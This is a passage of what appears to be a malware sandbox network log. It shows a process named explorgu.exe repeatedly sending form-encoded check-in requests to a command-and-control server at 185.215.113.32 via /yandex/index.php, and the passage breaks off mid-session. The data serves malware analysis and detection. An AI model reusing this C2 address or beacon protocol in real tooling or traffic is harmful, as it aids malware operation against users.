                                                                                            31192.168.2.449768185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:27.926951885 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:28.173376083 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:28.174143076 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:28.424500942 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.449769185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:28.769296885 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:29.006048918 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:29.007116079 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:29.249172926 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.449770185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:29.615597010 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:29.852567911 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:29.856883049 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:30.097688913 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.449771185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:30.455121040 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:30.701735973 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:30.702425003 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:30.953901052 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.449772185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:31.311126947 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:31.557441950 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:31.558731079 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:31.810272932 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            36192.168.2.449773185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:32.168018103 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:32.413182020 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:32.414024115 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:32.663604975 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            37192.168.2.449774185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:33.003896952 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:33.241334915 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:33.242000103 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:33.483659983 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            38192.168.2.449775185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:33.842220068 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:34.088579893 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:34.089288950 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:34.343538046 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            39192.168.2.449776185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:34.700267076 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:34.946809053 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:34.947632074 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:35.201756954 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            40192.168.2.449777185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:35.567992926 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:35.814976931 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:35.815677881 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:36.067846060 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            41192.168.2.449778185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:38.087555885 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:38.333147049 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:38.334060907 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:38.585720062 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            42192.168.2.449779185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:38.928082943 CET154OUTPOST /yandex/index.php HTTP/1.1
